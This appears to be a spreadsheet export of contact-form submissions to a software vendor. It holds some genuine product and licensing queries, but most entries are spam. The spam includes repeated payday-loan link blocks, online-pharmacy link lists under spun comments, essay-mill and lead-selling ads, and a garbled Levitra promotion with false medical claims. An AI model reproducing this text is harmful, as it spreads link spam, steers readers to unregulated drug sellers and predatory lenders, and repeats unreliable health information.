    <t>Sexual relationship can be a pleasurable give to get relationship with one?s partner. If anything goes completely wrong with this give to get process, it really is enough to derail the relationship. But any thing can happen and that is unpredictable. Moreover, able to keep a healthy sexual relationship means keeping oneself physically healthy. So just about any sexual disfunction must be helped by utmost care. One such health risk is impotence problems commonly seen in men. Unable to keep a proper and prolonged penile erection leads to erection dysfunction. This is infact a life threatening problem for maintaining a wholesome sexual relationship. So when there arises such a problem it?s smart to treat it in lieu of sitting quiet. _x000D_
 _x000D_
The choice between your various available treatment options involve treatment having a proper medicine. Response to a dental agent like Levitra can be be extremely effective on this context. Studies show that erection dysfunction is primarily because of insufficient flow of blood on the penis? veins and deficiency of stimulation at the same time. Practising oral therapy of Levitra increases the rate of blood circulation that gradually stimulates the penis providing a hard erection, adequate on an intercourse. _x000D_
 _x000D_
 _x000D_
 _x000D_
Levitra is but one such drug which can be found to be extremely effective. Clinically many experts have proved who's even conditions patients that are suffering from various medical problems like high blood pressure levels, high cholesterol levels or diabetes. A lot of men, who took Levitra the first time, responded positively for gaining high rate of success. Besides, many experts have also found it can be also taken to medicines employed to treat other medical conditions. _x000D_
 _x000D_
&lt;a href="https://www.cialispascherfr24.com/cialis-generique-comparer-prix/"&gt;https://www.cialispascherfr24.com/cialis-generique-comparer-prix/&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">CCC has the intention to move to the Open Text Edocs with email add-on.   I am currently working with a consultant to draft a structure before obtaining software but I have questions the consultant is unable to manage. </t>
  </si>
  <si>
    <t xml:space="preserve">Good morning Mme/Sir ;_x000D_
_x000D_
this is Manel Ben Amara,_x000D_
_x000D_
 I am a tunisian student at my second year of a professional master's degree of cybersecurity(networking, cloud, information security…) and and i will have the pleasure to help me  finding a final education project internship in cybersecurity in your company or abroad ._x000D_
_x000D_
My internship should be start from february 2019 as a minimum date._x000D_
_x000D_
thank you so much for help and i am waiting with impatience for your response_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Pourquoi une personne souffre-t-elle? _x000D_
La Bible donne la reponse a cela. Quand on a demande a Jesus, il a dit: au debut, ce n'etait pas le cas. Et comment etait-ce au debut? Au commencement, Dieu a cree l'homme a son image. Dans l'image, non seulement externe, mais aussi interne. En l'homme etait l'Esprit de Dieu, parce qu'il est ecrit: et lui a insuffle le souffle de la vie. Et a un autre endroit: Les mots que je vous dis sont esprit et vie. Dans le premier homme ne vivait que les paroles de Dieu. Dieu benit et donna a l'homme, le travail - cultiver le paradis, la nourriture - les fruits des arbres, et chaque graine herbe portant, famille - Soyez feconds, multipliez, carriere - reapprovisionner la terre, la puissance - la domination sur les betes, de la sante - respirait le souffle de la vie. Mais quand Satan a dit, vous vous serez comme des dieux et les gens ont ecoute les paroles de Dieu a laisse l'homme et l'esprit du monde, comme il est ecrit: le prince de l'air, est venu dans le c?ur de l'homme. A partir de ce moment-la, l'homme etait sur la terre damnee, car il est ecrit: "La terre est maudite pour vous." Ayant perdu l'Esprit de Dieu et ayant laisse l'esprit de Satan, l'homme est devenu l'enfant du diable. Et maintenant, tombant dans l'idolatrie, l'homme cherche l'absolu et se trouve dans les six etats de l'incroyant. L'idole de sa vie etait le travail, la famille, l'argent, le pouvoir, tout ce qui etait donne avec une benediction. Comme une personne ne trouve pas de satisfaction absolue a cela, il a des problemes mentaux. Ils sont suivis de pieges de Satan: Alco, la toxicomanie, la dependance sexuelle et au jeu, qui agissent comme une pilule pendant un certain temps, apres quoi le probleme ne fait qu’aggraver. Ensuite, des maladies physiques surviennent, puis la mort et la personne se presente au tribunal et, si la personne se trouve dans ces Etats, elle peut aller en enfer. Pourquoi diable? Parce qu'il est un enfant du diable, il se rend chez son pere. L'e</t>
  </si>
  <si>
    <t>Support-Dienstleistungen Open Text (VIM) bei einem neuen Kunde durch NOVO =&gt; Aufnahme NOVO als Service Partner</t>
  </si>
  <si>
    <t>Если у Вас: гаснет экран, изображение сужено по вертикали либо снизилась яркость... _x000D_
Если телевизору необходимы: замена системной платы, ремонт ТВ-тюнера или ремонт усилителя или (почти) любая другая процедура... _x000D_
 _x000D_
[url=https://providerurban.ru][img]http://servistas.ru/banners/tv/2tv067.jpg[/img][/url] _x000D_
 _x000D_
Телемастер с многолетним опытом РЕМОНТА ТЕЛЕВИЗОРОВ. _x000D_
(9.2'6)7'9-7,8-5,2 7 _x000D_
Михаил _x000D_
 _x000D_
Работаю с марками: Pioneer, Erisson, Daewoo, Helix, Nec, Dns, Bravis, Finlux, Galatec, Konka, Nordstar, Elenberg и всеми иными... _x000D_
 _x000D_
Выезжаю так же в районы: Тестовская, Новая площадь, Молоково, Новорублёво, как и по всей Москве</t>
  </si>
  <si>
    <t>Sales team email we have for you isn't working, need to email an RFQ to your sales team ASAP. Please provide one.</t>
  </si>
  <si>
    <t>loans online no credit check _x000D_
[url=http://loansmart24.com/]payday loans bad credit [/url] _x000D_
online loans for bad credit _x000D_
&lt;a href="http://loansmart24.com/"&gt;payday loans online bad credit &lt;/a&gt; _x000D_
small personal loans fast _x000D_
[url=https://loanswayer.com/]trusted payday loans online [/url] _x000D_
loans online instant _x000D_
&lt;a href="https://loanswayer.com/"&gt;payday loans no credit check &lt;/a&gt; _x000D_
small personal loans fast _x000D_
[url=https://loansxxonlinexx.org/]loans online instant [/url] _x000D_
small personal loans fast _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;payday lender fees &lt;/a&gt; _x000D_
fast quick loans online</t>
  </si>
  <si>
    <t>fast quick loans online _x000D_
[url=http://loansmart24.com/]payday loans online application [/url] _x000D_
payday lender fees _x000D_
&lt;a href="http://loansmart24.com/"&gt;payday personal loan &lt;/a&gt; _x000D_
payday loans online no credit check _x000D_
[url=https://loanswayer.com/]loans online instant approval [/url] _x000D_
payday loans las vegas _x000D_
&lt;a href="https://loanswayer.com/"&gt;payday loans online legit &lt;/a&gt; _x000D_
loans online instant approval _x000D_
[url=https://loansxxonlinexx.org/]payday loans bad credit [/url] _x000D_
online loans direct lenders _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;trusted payday loans online &lt;/a&gt; _x000D_
payday loans online application</t>
  </si>
  <si>
    <t>I'm trying to download the free trial and I am not getting the email to download it.  I've checked my spam and junk folders and have refreshed/closed my email many times.  The first attempt to download was yesterday and the second about 20 minutes ago.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to get a job in your company so I was searching suddenly I got this form, I felt happy after seeing forms and thought I got one chance to contact the OpenText company. </t>
  </si>
  <si>
    <t>I simply want a program to read/print  TIFF files.  Which one is my best, least-expensive option?  (Windows 10/Chrome)</t>
  </si>
  <si>
    <t>I need an urgent quote of tele form for optical scanning of surveys.  Could you please send me the quote today? We will be using it for a 36 months research project. Best wishes,_x000D_
_x000D_
Anilena</t>
  </si>
  <si>
    <t>best online loans instant approval _x000D_
[url=http://loansmart24.com/]online loans direct lenders [/url] _x000D_
speedy cash payday loans online _x000D_
&lt;a href="http://loansmart24.com/"&gt;online loans direct lenders &lt;/a&gt; _x000D_
online loans for bad credit _x000D_
[url=https://loanswayer.com/]loan cash [/url] _x000D_
payday loans online application _x000D_
&lt;a href="https://loanswayer.com/"&gt;online loans &lt;/a&gt; _x000D_
payday lender fees _x000D_
[url=https://loansxxonlinexx.org/]best fast loans online [/url] _x000D_
speedy cash payday loans online _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;trusted payday loans online &lt;/a&gt; _x000D_
payday loans in az</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Thank you for any other informative web site. Where else may just I get that type of information written in such an ideal method? I've a challenge that I'm just now operating on, and I have been at the glance out for such information. _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]buy allegra online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]lipitor 40 mg price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]buy lipitor 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]buy Crestor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]buy mevacor 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]buy generic zetia 10 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]buy discount zetia 10 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]zocor low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]purchase zyban 150 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]altace 5 mg cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]paxil low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]buy effexor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]discount celexa 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]lexapro low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]purchase celebrex[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]buy generic propecia[/url] _x000D_
[url=http://clotrimazole.ga]clotrimazole low price[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]commande clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]bestellen clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]ordine clotrimazole online[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]orden clotrimazole online[/url] _x000D_
[url=http://alendronates.ga]Alendronate sodium price[/url] _x000D_
[url=http://alendronates.ga/achat-alendronate.html]acheter fosamax en ligne[/url] _x000D_
[url=http://alendronates.ga/bestellen-alendronate.html]bestellen medikamente Ale</t>
  </si>
  <si>
    <t>online loans _x000D_
[url=http://loansmart24.com/]best fast loans online [/url] _x000D_
payday personal loan _x000D_
&lt;a href="http://loansmart24.com/"&gt;fast quick loans online &lt;/a&gt; _x000D_
loans online instant _x000D_
[url=https://loanswayer.com/]payday lender fees [/url] _x000D_
payday loans online legit _x000D_
&lt;a href="https://loanswayer.com/"&gt;fast quick loans online &lt;/a&gt; _x000D_
online payday loans tx _x000D_
[url=https://loansxxonlinexx.org/]payday loans definition [/url] _x000D_
payday loans online application _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;loan cash &lt;/a&gt; _x000D_
online loans</t>
  </si>
  <si>
    <t xml:space="preserve">I want to purchase a copy of First Class. Please don't put me through to your big vendors. I want to become my own, manage my own, and expand a large research project without all of their fees.  </t>
  </si>
  <si>
    <t>payday loans las vegas _x000D_
[url=http://loansmart24.com/]best online loans instant approval [/url] _x000D_
payday loans online no credit check _x000D_
&lt;a href="http://loansmart24.com/"&gt;payday loans in az &lt;/a&gt; _x000D_
loans online instant _x000D_
[url=https://loanswayer.com/]small personal loans fast [/url] _x000D_
loans online no credit check _x000D_
&lt;a href="https://loanswayer.com/"&gt;online payday loans tx &lt;/a&gt; _x000D_
payday personal loan _x000D_
[url=https://loansxxonlinexx.org/]online payday loans tx [/url] _x000D_
online loans direct lenders _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;payday loans bad credit &lt;/a&gt; _x000D_
best fast loans online</t>
  </si>
  <si>
    <t xml:space="preserve">We need Trusted Link tool specific training for our team of 4 peoples . Could you please provide a cost for the same if you can provide . </t>
  </si>
  <si>
    <t>loans online application _x000D_
[url=http://loansmart24.com/]best online loans instant approval [/url] _x000D_
payday loans no credit check _x000D_
&lt;a href="http://loansmart24.com/"&gt;payday loans in az &lt;/a&gt; _x000D_
best online loans instant approval _x000D_
[url=https://loanswayer.com/]online loans direct lenders [/url] _x000D_
payday personal loan _x000D_
&lt;a href="https://loanswayer.com/"&gt;small personal loans fast &lt;/a&gt; _x000D_
payday loans no credit check _x000D_
[url=https://loansxxonlinexx.org/]payday loans bad credit [/url] _x000D_
best fast loans online _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;best fast loans online &lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Excellent beat ! I would like to apprentice whilst you amend your website, how could i subscribe for a weblog site? The account aided me a applicable deal. I have been a little bit acquainted of this your broadcast offered shiny clear concept _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]allegra 180 mg cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]lipitor 40 mg low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]order lipitor online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]buy Crestor online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]order mevacor 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]order zetia[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]buy zetia 10 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]purchase zocor 40 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]zyban cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]purchase altace 5 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]order paxil 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]order effexor 75 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]buy celexa[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]order lexapro 20 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]celebrex 200 mg price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]discount propecia 1 mg[/url] _x000D_
[url=http://clotrimazole.ga]buy generic clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]clotrimazole bas prix[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]clotrimazole preis online[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]farmaci online clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]clotrimazole comprimidos online[/url] _x000D_
[url=http://alendronates.ga]order Alendronate sodium[/url] _x000D_
[url=http://alendronates.ga/achat-alendronate.html]achat Alendronate sodium[/url] _x000D_
[url=http://alendronates.ga/bestellen-</t>
  </si>
  <si>
    <t>Bonjour._x000D_
Nous avons en exploitation un installation avec streamserve V3 !!!_x000D_
(la maintenance a été interrompue il y a longtemps). je reprends le dossier et les OS ne sont plus supportés!_x000D_
Pouvons nous mettre à jour vers une version supportée ?, migration possible des projets depuis la V3 ? quel serait l'ordre de grandeur du cout ? ( 1 lic production et 1 lic developpement)?_x000D_
d'avance merci de vos indications , vous pouvez me contacter par tel pour plus de précisions._x000D_
Alain vanlichtervelde</t>
  </si>
  <si>
    <t>online loans _x000D_
[url=http://loansmart24.com/]loans online no credit check [/url] _x000D_
payday loans online no credit check _x000D_
&lt;a href="http://loansmart24.com/"&gt;online loans &lt;/a&gt; _x000D_
loans online application _x000D_
[url=https://loanswayer.com/]no credit check payday loans instant approval [/url] _x000D_
online loans _x000D_
&lt;a href="https://loanswayer.com/"&gt;payday personal loan &lt;/a&gt; _x000D_
payday personal loan _x000D_
[url=https://loansxxonlinexx.org/]trusted payday loans online [/url] _x000D_
get online loan fast _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;loans online instant &lt;/a&gt; _x000D_
payday loans bad credit</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Are you interested to AWS Users?_x000D_
_x000D_
We have 1245 Ready-to- buy leads of AWS Technology Customers Records from New York._x000D_
We will provide Test file to check quality_x000D_
_x000D_
kindly get back to us for more information_x000D_
_x000D_
Thank you_x000D_
</t>
  </si>
  <si>
    <t>Kindly I had OpenText EFM for SAP Solutions – Consultant Bootcamp In Dubai before 3 years, can i get any training certification on that.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Hi there, this weekend is nice in favor of me, for the reason that this occasion i am reading this wonderful informative paragraph here at my house. _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]buy allegra 180 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]cheap lipitor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]buy lipitor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]Crestor 10 mg price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]buy mevacor online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]discount zetia[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]buy zetia online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]order zocor 40 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]buy zyban online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]discount altace[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]buy paxil online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]order effexor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]buy discount celexa 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]buy discount lexapro[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]buy discount celebrex 200 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]propecia 1 mg cost[/url] _x000D_
[url=http://clotrimazole.ga]discount clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]commande clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]clotrimazole preis online[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]comprare pillole online clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]barato clotrimazole[/url] _x000D_
[url=http://alendronates.ga]order fosamax online[/url] _x000D_
[url=http://alendronates.ga/achat-alendronate.html]fosamax pilules en ligne[/url] _x000D_
[url=http://alendronates.ga/bestellen-alendronate.html]Alendronate sodium preis online[/url] _x000D_
[url=http://alendronates.ga/compra-alendronate.html]comprare</t>
  </si>
  <si>
    <t>payday loans online legit _x000D_
[url=http://loansmart24.com/]no credit check payday loans instant approval [/url] _x000D_
best fast loans online _x000D_
&lt;a href="http://loansmart24.com/"&gt;loan cash &lt;/a&gt; _x000D_
online payday loans tx _x000D_
[url=https://loanswayer.com/]online loans direct lenders [/url] _x000D_
online loans direct lenders _x000D_
&lt;a href="https://loanswayer.com/"&gt;get online loan fast &lt;/a&gt; _x000D_
payday loans online legit _x000D_
[url=https://loansxxonlinexx.org/]loans online instant [/url] _x000D_
speedy cash payday loans online _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;online loans &lt;/a&gt; _x000D_
payday loans online application</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
What i don't understood is in truth how you're not really a lot more well-appreciated than you might be now. You are very intelligent. You know therefore considerably relating to this matter, produced me for my part imagine it from numerous various angles. Its like men and women are not involved except it's one thing to accomplish with Girl gaga! Your personal stuffs great. Always care for it up! _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]discount allegra 180 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]lipitor cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]lipitor 20 mg cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]discount Crestor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]order mevacor online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]zetia 10 mg low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]discount zetia 10 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]zocor 40 mg low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]buy zyban 150 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]order altace 5 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]buy generic paxil[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]buy effexor 75 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]order celexa 20 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]buy lexapro 20 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]buy celebrex 200 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]order propecia online[/url] _x000D_
[url=http://clotrimazole.ga]clotrimazole cost[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]clotrimazole bas prix[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]bestellen clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]clotrimazole medica farmaci[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]comprar clotrimazole[/url] _x000D_
[url=http://alendronates.ga]or</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
I love your blog.. very nice colors &amp; theme. Did you create this website yourself or did you hire someone to do it for you? Plz reply as I'm looking to construct my own blog and would like to find out where u got this from. appreciate it _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]discount allegra[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]buy generic lipitor 40 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]order lipitor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]Crestor price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]order mevacor 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]purchase zetia[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]discount zetia[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]buy generic zocor 40 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]buy generic zyban 150 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]purchase altace 5 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]paxil cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]buy discount effexor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]discount celexa 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]cheap lexapro[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]buy celebrex 200 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]order propecia 1 mg online[/url] _x000D_
[url=http://clotrimazole.ga]buy clotrimazole online[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]commande clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]kaufen billige clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]farmaci online clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]orden clotrimazole online[/url] _x000D_
[url=http://alendronates.ga]buy discount fosamax[/url] _x000D_
[url=http://alendronates.ga/achat-alendronate.html]acheter fosamax[/url] _x000D_
[url=http://alendronates.ga/bestellen-alendronate.html]kaufen billige fosam</t>
  </si>
  <si>
    <t>Our contract for support is not associated with this email account. Please get that associated ASAP.</t>
  </si>
  <si>
    <t>loans online application _x000D_
[url=http://loansmart24.com/]loans online only [/url] _x000D_
no credit check payday loans instant approval _x000D_
&lt;a href="http://loansmart24.com/"&gt;payday loans online legit &lt;/a&gt; _x000D_
loans online application _x000D_
[url=https://loanswayer.com/]loans online instant [/url] _x000D_
online loans direct lenders _x000D_
&lt;a href="https://loanswayer.com/"&gt;payday loans no credit check &lt;/a&gt; _x000D_
payday loans bad credit _x000D_
[url=https://loansxxonlinexx.org/]payday loans las vegas [/url] _x000D_
loans online only _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;small personal loans fast &lt;/a&gt; _x000D_
payday loans online application</t>
  </si>
  <si>
    <t xml:space="preserve">american business opportunities Discriminates_x000D_
_x000D_
issues towards oldest people today wanting EmploymentRetirees who exactly deliberate you can find another job promptly after your retirement have found not many purchases just in case different. [url=https://charmingdate-com.tumblr.com/]charmdate review[/url] so why? towards fact 'Age Discrimination' remains to be standing in front of senior usa high-risk workers, as well as the legislature is not so helping as they are still waiting on their biceps still; waiting around for problem to go away or become known as someone else's send to fix. people get you have era elegance inside the a job turn. any idea what? appear at this situation bandwidth service:people may only all the advice available on behalf of retired persons; the fact that informing starting on someone's own small business. sure, properly in this economy. as well, a bit of indicate; i'd guess that choosing the best job where pays off much cheaper than the retired persons becoming designing but making an effort._x000D_
_x000D_
and in addition, I say to this idea past guidance: most retired persons would be happy to work at work even tough it payed off a lesser number of to boost those retirement cash flow. One concern is several appliers to be able to not many things, presented._x000D_
_x000D_
motive? basically because congress is still this enables "outsourced workers of yankee duties, aren't getting us a began on this chosen issue among the us will develop a pain._x000D_
_x000D_
become old elegance proceeds right in 2015Now, an additional issue is how business owners steer in and around "age category discrimination" nonetheless make an appearance legal over it. These are most likely the same marketers which often keep discriminate your jobless._x000D_
_x000D_
persons in these two classes happen to be taken under the square area rug while using the big politics broom; therefore,, those that are implemented and also retirees who are a select few to purchase performance; comprehend it is all totally fine </t>
  </si>
  <si>
    <t>Hallo nochmals _x000D_
_x000D_
Was sind die aktuellsten Versionen für folgende Software:_x000D_
_x000D_
Livelink Office Editor_x000D_
Livelink Viewer</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
Could you please let me know what the latest version of the enterprise connect framework is? _x000D_
_x000D_
Thanks in advance!_x000D_
_x000D_
Remo</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Hello, yes this article is genuinely good and I have learned lot of things from it about blogging. thanks. _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]buy allegra[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]buy discount lipitor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]order lipitor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]buy discount Crestor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]order mevacor 20 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]buy discount zetia[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]buy zetia 10 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]cheap zocor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]buy zyban 150 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]buy altace[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]paxil price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]order effexor 75 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]order celexa 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]order lexapro 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]order celebrex 200 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]order propecia 1 mg online[/url] _x000D_
[url=http://clotrimazole.ga]discount clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]achat clotrimazole en ligne[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]kaufen apotheke clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]comprare pillole online clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]comprar clotrimazole[/url] _x000D_
[url=http://alendronates.ga]cheap Alendronate sodium[/url] _x000D_
[url=http://alendronates.ga/achat-alendronate.html]achat fosamax en ligne[/url] _x000D_
[url=http://alendronates.ga/bestellen-alendronate.html]kaufen billige Alendronate sodium[/url] _x000D_
[url=http://alendronates.ga/compra-alendronate.html]comprare generico fosamax[/url] _x000D_
[url=</t>
  </si>
  <si>
    <t>I'd like to know which options I have for a consulting course (so focus on configuring) on SAP invoice management. Preferably in the Netherlands, but e-learning would also suffice. Which courses are available?_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Jesse Brock</t>
  </si>
  <si>
    <t>We can [url=https://essay-zone.com/buy-essay-online/]buy essay online cheap[/url] and very quickly</t>
  </si>
  <si>
    <t>We have been invited to participate for Provision for Open Text Content Server (Livelink) Installation with support &amp; maintenance.  Can you assist us?</t>
  </si>
  <si>
    <t>Quotation for Open Text license renewal for client</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
I don't even know how I ended up here, but I thought this post was great. I do not know who you are but definitely you are going to a famous blogger if you are not already ;) Cheers! _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]buy allegra 180 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]buy lipitor 40 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]lipitor 20 mg low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]discount Crestor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]order mevacor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]buy zetia online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]buy generic zetia[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]zocor cost[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]buy discount zyban[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]cheap altace 5 mg[/url] _x000D_
